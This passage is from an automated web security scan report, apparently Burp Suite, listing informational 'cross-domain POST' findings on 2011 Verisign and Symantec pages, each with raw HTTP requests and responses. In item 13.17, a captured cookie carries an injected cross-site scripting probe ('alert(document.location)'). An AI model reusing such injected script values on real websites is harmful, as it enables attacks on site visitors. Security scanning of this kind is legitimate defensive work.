GET /hc/2735064/?&site=2735064&cmd=mTagInviteShown&lpCallId=320617608027-425706728594&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:35:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:35:25 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 343 lpConnLib.Process({"ResultSet": {"lpCallId":"320617608027-425706728594","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
13. Cross-domain POST
There are 25 instances of this issue:
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
13.1. https://knowledge.verisign.ch/support/code-signing-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/code-signing-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale, submit
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="sbmodulebody"> <form name="checkOrder" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> Order Number<sup>...[SNIP]...
13.2. https://knowledge.verisign.ch/support/code-signing-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/code-signing-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.3. https://knowledge.verisign.ch/support/code-signing-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/code-signing-support/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:
Request
GET /support/code-signing-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.4. https://knowledge.verisign.ch/support/digital-id-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/digital-id-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale
Request
GET /support/digital-id-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.5. https://knowledge.verisign.ch/support/digital-id-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/digital-id-support/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:
Request
GET /support/digital-id-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:04 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.6. https://knowledge.verisign.ch/support/mpki-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/mpki-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.7. https://knowledge.verisign.ch/support/mpki-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/mpki-support/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:
Request
GET /support/mpki-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:13 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.8. https://knowledge.verisign.ch/support/ssl-certificates-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/ssl-certificates-support/index
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.9. https://knowledge.verisign.ch/support/ssl-certificates-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/ssl-certificates-support/index
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/ssl-certificates-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale, submit
Request
GET /support/ssl-certificates-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:28 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="sbmodulebody"> <form name="checkOrder" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> Order Number<sup>...[SNIP]...
13.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/trust-seal-support/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <div class="partner_form"> <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post" id="partner_login" name="logonForm"> <div>...[SNIP]...
13.14. https://knowledge.verisign.ch/support/trust-seal-support/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/trust-seal-support/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale
Request
GET /support/trust-seal-support/index.html HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... </h4> <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post"> <fieldset id="myacc_fieldset">...[SNIP]...
13.15. http://query.verisign.ch/search
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.ch
Path:
/search
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:
Request
GET /search HTTP/1.1 Host: query.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:19 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 43489 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> <meta http...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]...
13.16. http://query.verisign.ch/search
Summary
Severity:
Information
Confidence:
Certain
Host:
http://query.verisign.ch
Path:
/search
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale
Request
GET /search HTTP/1.1 Host: query.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:19 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 43489 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> <meta http...[SNIP]... </h4> <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top"> <fieldset id="myacc_fieldset">...[SNIP]...
13.17. https://renewals.symantec.com/renewals/chat_form.jsp
Summary
Severity:
Information
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/chat_form.jsp
Issue detail
The page contains a form which POSTs data to the domain admin.instantservice.com. The form contains the following fields: ai, di, it, optionaldata, fname, lname, optionaldata2, company_size, company_size, company_size, company_size, company_size, company_size, company_size, email, phone, optionaldata1
Request
GET /renewals/chat_form.jsp HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?page=renewal_search.jsp&action=button(submit) User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(document.location)//6e6ee0889dd&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; JSESSIONID=kTPJTqGNKfPrjNnpLGPypQ8JJCYnkLr5W1R124KMsH1FBQvFMQ07!1524362598; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_pers=%20s_nr%3D1315622354515-New%7C1336358354515%3B%20event69%3Devent69%7C1336358354517%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:39:05 GMT Content-Type: text/html Content-Length: 15726 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- BEGIN IMPORT_INCLUDE--> <!--END IMPORT_INCLUDE--> <html> <head><ti...[SNIP]... <body><FORM action="https://admin.instantservice.com/Customer" method="post" name="custform"> <INPUT TYPE="HIDDEN" NAME="ai" VALUE="6227">...[SNIP]...
13.18. http://www.verisign.ch/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]...
13.19. http://www.verisign.ch/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... </h4> <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top"> <fieldset id="myacc_fieldset">...[SNIP]...
13.20. http://www.verisign.ch/contact-information/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/contact-information/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 39107 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="/assets/corp/css/corp_generic_st...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]...
13.21. http://www.verisign.ch/contact-information/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/contact-information/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 39107 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="/assets/corp/css/corp_generic_st...[SNIP]... </h4> <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top"> <fieldset id="myacc_fieldset">...[SNIP]...
13.22. http://www.verisign.ch/corporate/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/corporate/index.html
Issue detail
The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields: order_number, application_locale
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag...[SNIP]... </h4> <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top"> <fieldset id="myacc_fieldset">...[SNIP]...
13.23. http://www.verisign.ch/corporate/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/corporate/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag...[SNIP]... <div class="partner_form"> <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank"> <div>...[SNIP]...
13.24. http://www.verisign.ch/trust-seal/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/trust-seal/index.html
Issue detail
The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:
Request
